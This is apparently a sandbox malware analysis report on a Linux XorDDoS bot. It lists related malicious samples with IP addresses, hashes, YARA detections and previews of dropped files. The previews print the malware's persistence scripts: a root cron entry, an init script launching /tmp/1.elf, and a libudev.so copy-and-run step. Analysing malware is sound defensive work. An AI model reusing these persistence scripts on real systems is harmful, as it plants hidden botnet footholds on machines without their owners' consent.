                                                                                                                                            skid.x86-20231016-0000.elfGet hashmaliciousUnknownBrowse
                                                                                                                                            • 156.243.156.240
                                                                                                                                            Vs8pIMtfLG.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 154.195.146.206
                                                                                                                                            f46hRyQrrk.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 156.243.156.251
                                                                                                                                            Ap4oD0Iqq6.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 156.247.76.145
                                                                                                                                            EhcEpjpjad.elfGet hashmaliciousUnknownBrowse
                                                                                                                                            • 156.243.156.232
                                                                                                                                            PEGTECHINCUS#U00f6deme_talimat#U0131.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 142.4.119.230
                                                                                                                                            b3astmode.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 154.84.242.243
                                                                                                                                            arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 156.247.76.124
                                                                                                                                            sOmYWENS1I.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 107.149.44.149
                                                                                                                                            m7MeI7tiks.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 156.247.76.128
                                                                                                                                            https://www.smbc.acctenet.info/Get hashmaliciousUnknownBrowse
                                                                                                                                            • 108.186.251.186
                                                                                                                                            7c912KO5XC.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                                            • 107.148.223.82
                                                                                                                                            Overdue_payment_settled.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 142.4.119.230
                                                                                                                                            Orden_de_compra.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 108.186.24.219
                                                                                                                                            Hgh7WMRLzKPX09P.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 142.4.119.230
                                                                                                                                            hesaphareketi-01.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 107.148.95.217
                                                                                                                                            doc_20232407993001901.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 107.148.95.217
                                                                                                                                            e-dekont.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                                            • 142.4.119.230
                                                                                                                                            EOQvIhNLzI.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                                            • 107.148.223.82
                                                                                                                                            9OXb5VhqNL.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                                            • 154.195.80.66
                                                                                                                                            skid.x86-20231016-0000.elfGet hashmaliciousUnknownBrowse
                                                                                                                                            • 156.243.156.240
                                                                                                                                            Vs8pIMtfLG.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 154.195.146.206
                                                                                                                                            f46hRyQrrk.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 156.243.156.251
                                                                                                                                            Ap4oD0Iqq6.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 156.247.76.145
                                                                                                                                            EhcEpjpjad.elfGet hashmaliciousUnknownBrowse
                                                                                                                                            • 156.243.156.232
                                                                                                                                            PEGTECHINCUS#U00f6deme_talimat#U0131.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 142.4.119.230
                                                                                                                                            b3astmode.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 154.84.242.243
                                                                                                                                            arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 156.247.76.124
                                                                                                                                            sOmYWENS1I.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 107.149.44.149
                                                                                                                                            m7MeI7tiks.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 156.247.76.128
                                                                                                                                            https://www.smbc.acctenet.info/Get hashmaliciousUnknownBrowse
                                                                                                                                            • 108.186.251.186
                                                                                                                                            7c912KO5XC.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                                            • 107.148.223.82
                                                                                                                                            Overdue_payment_settled.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 142.4.119.230
                                                                                                                                            Orden_de_compra.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 108.186.24.219
                                                                                                                                            Hgh7WMRLzKPX09P.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 142.4.119.230
                                                                                                                                            hesaphareketi-01.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 107.148.95.217
                                                                                                                                            doc_20232407993001901.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            • 107.148.95.217
                                                                                                                                            e-dekont.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                                            • 142.4.119.230
                                                                                                                                            EOQvIhNLzI.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                                            • 107.148.223.82
                                                                                                                                            9OXb5VhqNL.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                                            • 154.195.80.66
                                                                                                                                            skid.x86-20231016-0000.elfGet hashmaliciousUnknownBrowse
                                                                                                                                            • 156.243.156.240
                                                                                                                                            Vs8pIMtfLG.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 154.195.146.206
                                                                                                                                            f46hRyQrrk.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 156.243.156.251
                                                                                                                                            Ap4oD0Iqq6.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 156.247.76.145
                                                                                                                                            EhcEpjpjad.elfGet hashmaliciousUnknownBrowse
                                                                                                                                            • 156.243.156.232
                                                                                                                                            No context
                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            /etc/cron.hourly/gcc.shiJl2Sb6qRaGet hashmaliciousXorDDoSBrowse
                                                                                                                                              Di1p3oLnDb.elfGet hashmaliciousXorDDoSBrowse
                                                                                                                                                fuck.elfGet hashmaliciousXorDDoSBrowse
                                                                                                                                                  dkuidbsedpGet hashmaliciousXorDDoSBrowse
                                                                                                                                                    libudev.soGet hashmaliciousXorDDoSBrowse
                                                                                                                                                      23.virGet hashmaliciousXorDDoSBrowse
                                                                                                                                                        23.virGet hashmaliciousXorDDoSBrowse
                                                                                                                                                          xor1.oGet hashmaliciousXorDDoSBrowse
                                                                                                                                                            CCCxor.oGet hashmaliciousXorDDoSBrowse
                                                                                                                                                              2BAFxor.oGet hashmaliciousXorDDoSBrowse
                                                                                                                                                                task2.binGet hashmaliciousXorDDoSBrowse
                                                                                                                                                                  task2.binGet hashmaliciousXorDDoSBrowse
                                                                                                                                                                    task2.binGet hashmaliciousXorDDoSBrowse
                                                                                                                                                                      0Xorddos.oGet hashmaliciousXorDDoSBrowse
                                                                                                                                                                        x.oGet hashmaliciousXorDDoSBrowse
                                                                                                                                                                          23Get hashmaliciousXorDDoSBrowse
                                                                                                                                                                            23Get hashmaliciousXorDDoSBrowse
                                                                                                                                                                              XZFWLZVF1ZGet hashmaliciousXorDDoSBrowse
                                                                                                                                                                                EgrT0zBhDaGet hashmaliciousXorDDoSBrowse
                                                                                                                                                                                  4ljhdTTyiAGet hashmaliciousXorDDoSBrowse
                                                                                                                                                                                    Process:/tmp/1.elf
                                                                                                                                                                                    File Type:POSIX shell script, ASCII text executable
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):228
                                                                                                                                                                                    Entropy (8bit):4.807897441464882
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:TKH4v1kxtsLNELQ9YmPQnMLnVMPQmlZnEMFaGZg28Xwf6SkCVcLNGLC75pkVKJdm:htiy4Mrm9lVNy28XbCVP270gJdE/v
                                                                                                                                                                                    MD5:3BAB747CEDC5F0EBE86AAA7F982470CD
                                                                                                                                                                                    SHA1:3C7D1C6931C2B3DAE39D38346B780EA57C8E6142
                                                                                                                                                                                    SHA-256:74D31CAC40D98EE64DF2A0C29CEB229D12AC5FA699C2EE512FC69360F0CF68C5
                                                                                                                                                                                    SHA-512:21E8A6D9CA8531D37DEF83D8903E5B0FA11ECF33D85D05EDAB1E0FEB4ACAC65AE2CF5222650FB9F533F459CCC51BB2903276FF6F827B847CC5E6DAC7D45A0A42
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 28%
                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                    • Filename: iJl2Sb6qRa, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: Di1p3oLnDb.elf, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: fuck.elf, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: dkuidbsedp, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: libudev.so, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: 23.vir, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: 23.vir, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: xor1.o, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: CCCxor.o, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: 2BAFxor.o, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: task2.bin, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: task2.bin, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: task2.bin, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: 0Xorddos.o, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: x.o, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: 23, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: 23, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: XZFWLZVF1Z, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: EgrT0zBhDa, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: 4ljhdTTyiA, Detection: malicious, Browse
                                                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                                                    Preview:#!/bin/sh.PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin.for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done.cp /lib/libudev.so /lib/libudev.so.6./lib/libudev.so.6.
                                                                                                                                                                                    Process:/bin/sh
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):41
                                                                                                                                                                                    Entropy (8bit):3.8484226636198593
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:FFP13tKebPv4KFcKv:/P1IebPPFcKv
                                                                                                                                                                                    MD5:636299E19F3BFB8CDA661BC956C1CE7F
                                                                                                                                                                                    SHA1:2B45273CCBFE139D58FC3554D6943D4338C18E15
                                                                                                                                                                                    SHA-256:8CBDE8A027F2887DD7A3C5C6F98FDF127BAE31FE457FEF9D7945C9E48D195F44
                                                                                                                                                                                    SHA-512:41AF1A49B86C9C81965AF32B404494CC5072AFDA004F385977110F8EA134A770650CBD2F9617AFCD87D6744954659BE4AE365E65DCA4491A375275E710310F1A
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                                                    Preview:*/3 * * * * root /etc/cron.hourly/gcc.sh.
                                                                                                                                                                                    Process:/tmp/1.elf
                                                                                                                                                                                    File Type:POSIX shell script, ASCII text executable
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):290
                                                                                                                                                                                    Entropy (8bit):5.196016600827097
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6:hUtoFdU9j0sKheJf24BE21YJvmNeMwhr2Q1DzRItAn6MzoAf4:6rf24BEMO1fzuynzdg
                                                                                                                                                                                    MD5:DAF0CAF17D92CB9E3B8DA3DFC53C7147
                                                                                                                                                                                    SHA1:8C55946DCEB3A1D3161BCDDB45EFEB9AD58C8D78
                                                                                                                                                                                    SHA-256:CD3CB6574A33CA82144A2FE75CBFAEBC931B4CCC831D0FB1868F139C6D2B8B6F
                                                                                                                                                                                    SHA-512:2CC61BAE5213FC9A8DDAF791D5A17A0AFE62EE9543CF7979F835ACF3264391F8C2D88E45455ACB2196B0476B1790060AF3C6E6617DEE8F375DCA5663BBCC09BE
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:#!/bin/sh.# chkconfig: 12345 90 90.# description: 1.elf.### BEGIN INIT INFO.# Provides:..1.elf.# Required-Start:..# Required-Stop:..# Default-Start:.1 2 3 4 5.# Default-Stop:...# Short-Description:.1.elf.### END INIT INFO.case $1 in.start)../tmp/1.elf..;;.stop)..;;.*)../tmp/1.elf..;;.esac.
                                                                                                                                                                                    Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):76
                                                                                                                                                                                    Entropy (8bit):3.7627880354948586
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                                                                                                                                                                    MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                                                                                                                                                                    SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                                                                                                                                                                    SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                                                                                                                                                                    SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                                                    Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                                                                                                                                                                    Process:/tmp/1.elf
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):32
                                                                                                                                                                                    Entropy (8bit):4.202819531114783
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:XfHUHTPewwddI:PYD7
                                                                                                                                                                                    MD5:6E74B43719EA3696E5F9F5DF87EADB8C
                                                                                                                                                                                    SHA1:0057A6800777921D82B60FCFFB6DCA412562C9FC
                                                                                                                                                                                    SHA-256:4B9D182E84C62923EAA24BF04240C272A1F7EEF3356F09A2D2C0CCF506596252
                                                                                                                                                                                    SHA-512:7934030975F1D0B72762A5B59DA6AE7593E109596681B296316090197F5ADEC0B91224091E3D9CFDC5DE236A88896E10B82359DF8DE1C788EA6F080E9663F8BE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:fgmoabirnicsesqjfpuivnebyqywfxxm
                                                                                                                                                                                    Process:/tmp/1.elf
                                                                                                                                                                                    File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):625878
                                                                                                                                                                                    Entropy (8bit):6.244377063567257
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4UlUuTh1AV:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl/91s
                                                                                                                                                                                    MD5:305F5484460FEB573C4A06D56E6AC96A
                                                                                                                                                                                    SHA1:10A5F02B6798761E346BA82C5B9AA3434769122C
                                                                                                                                                                                    SHA-256:89406B479B23068E9CF202E20AC39E622B60DCAC797E42C5E2313DE8AB34A52A
                                                                                                                                                                                    SHA-512:9B35B6690B691E759D8B78409091DBF960580B387E2C14BBDB3548B7ED2EB2F22F3E0B27B97A7C7A6A1872938D604E1C05521FC656B8BAC1C0697A8DC85DE115
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                    • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/bjhrrojebv, Author: Joe Security
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/bjhrrojebv, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/bjhrrojebv, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/bjhrrojebv, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/bjhrrojebv, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/bjhrrojebv, Author: unknown
                                                                                                                                                                                    • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/bjhrrojebv, Author: Akamai CSIRT
                                                                                                                                                                                    • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/bjhrrojebv, Author: ditekSHen
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                                                                                                                                    Process:/tmp/1.elf
                                                                                                                                                                                    File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):625878
                                                                                                                                                                                    Entropy (8bit):6.244376854378132
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4UlUuTh1AM:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl/91t
                                                                                                                                                                                    MD5:6A5ECA188339A325E9AC1189DBB89376
                                                                                                                                                                                    SHA1:08AF39951A3E2DA9DCCED1C0AA85B83BA265F410
                                                                                                                                                                                    SHA-256:4E93904AF15363E5024EABC22B6EED848A9720A4922F772E6ABF1FA009241A73
                                                                                                                                                                                    SHA-512:489E63471B7469684F76809BBFD222DB9DBA32DF4A23616780543A438725E7D4819E077EA60EF6584CBC952A7A644EB77044247704C8FDFBA25B51DBE135E214
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                    • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/ccxfvtbhgr, Author: Joe Security
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/ccxfvtbhgr, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/ccxfvtbhgr, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/ccxfvtbhgr, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/ccxfvtbhgr, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/ccxfvtbhgr, Author: unknown
                                                                                                                                                                                    • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/ccxfvtbhgr, Author: Akamai CSIRT
                                                                                                                                                                                    • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/ccxfvtbhgr, Author: ditekSHen
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                                                                                                                                    Process:/tmp/1.elf
                                                                                                                                                                                    File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):625878
                                                                                                                                                                                    Entropy (8bit):6.244381746371613
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4UlUuTh1Ai:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl/91n
                                                                                                                                                                                    MD5:BDF7E50117E6BB11039B3F114D7DA203
                                                                                                                                                                                    SHA1:3BD4C16719D3336C56F846696E9DA41B49D14F56
                                                                                                                                                                                    SHA-256:C73DCC540E777840CCCB1E2053954355E4B8AE0EA77713D44634EFBB9F2B42D7
                                                                                                                                                                                    SHA-512:46357B644ACDAF99E6EFC85DCB2A86014329F3BB0A0D048427495806275516777EA79AD07FF82A4EFF031368C8AC1A9A9BCF65C96883D0EAF02C834C9B84212B
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                    • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/cpbnjarskl, Author: Joe Security
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/cpbnjarskl, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/cpbnjarskl, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/cpbnjarskl, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/cpbnjarskl, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/cpbnjarskl, Author: unknown
                                                                                                                                                                                    • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/cpbnjarskl, Author: Akamai CSIRT
                                                                                                                                                                                    • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/cpbnjarskl, Author: ditekSHen
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                                                                                                                                    Process:/tmp/1.elf
                                                                                                                                                                                    File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):625878
                                                                                                                                                                                    Entropy (8bit):6.244375523768904
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4UlUuTh1AR:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl/914
                                                                                                                                                                                    MD5:0ACA8CF23A8C3E87B13A9C7043110017
                                                                                                                                                                                    SHA1:A83054CDDB46F40BD6102D7A7D8885ED2B42D8BA
                                                                                                                                                                                    SHA-256:161F8708CC5CDB80FD5C1B8781B41C2823200B1A34ADA38EDC378ACB39E5276B
                                                                                                                                                                                    SHA-512:97D6582F64EA4446123A964FE9DEFB20F8356ACF91DF602851D85AF6DDFB2AFA7B655B913E2168FAFCFE844FAD8E396253396B21065E4633B2D828A3C3A170C7
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                    • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/dyuvutukki, Author: Joe Security
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/dyuvutukki, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/dyuvutukki, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/dyuvutukki, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/dyuvutukki, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/dyuvutukki, Author: unknown
                                                                                                                                                                                    • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/dyuvutukki, Author: Akamai CSIRT
                                                                                                                                                                                    • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/dyuvutukki, Author: ditekSHen
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                                                                                                                                    Process:/tmp/1.elf
                                                                                                                                                                                    File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):625878
                                                                                                                                                                                    Entropy (8bit):6.244392832107416
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4UlUuTh1AV:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl/91A
                                                                                                                                                                                    MD5:5ADF54DA233DDD71999A30AE5852D13E
                                                                                                                                                                                    SHA1:8E6CE812F67B6E105AF07A0B50B79BDF19406569
                                                                                                                                                                                    SHA-256:0258AD622C127C91F1FD910C554400613B9232005A39BE2ADA67942585A9B378
                                                                                                                                                                                    SHA-512:23FFD6480D0D1CB37F998121A2A9DD47C9A8A8476BE3E2D6D8DB8E2E70AB822D48556599C7564DB729536114F8A3C02F290BDDE29D69EA623AA8DF6D8456B76E
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                    • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/efgdvbpuxx, Author: Joe Security
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/efgdvbpuxx, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/efgdvbpuxx, Author: unknown
